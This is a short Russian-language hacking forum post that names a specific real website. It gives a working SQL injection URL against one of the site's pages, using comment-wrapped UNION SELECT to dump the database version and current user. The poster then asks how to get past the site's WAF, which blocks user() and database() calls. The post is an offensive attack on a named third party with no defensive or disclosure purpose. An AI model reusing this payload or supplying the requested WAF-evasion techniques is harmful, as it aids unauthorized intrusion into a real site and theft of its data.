04.10.2015, 14:50
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сайт: endividado.com.br
Уязвимость: SQLi (с обходом WAF)
Эксплоит:
Код:
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,version%28%29,current_user,4,5,6,7+--+
Собственно вопрос - WAF блокирует запрос при появлении user(), database(). Как такое обходить? Пробовал играться с комментариями, строчные/прописные - все равно блок. Что еще можно попробовать? |
|
|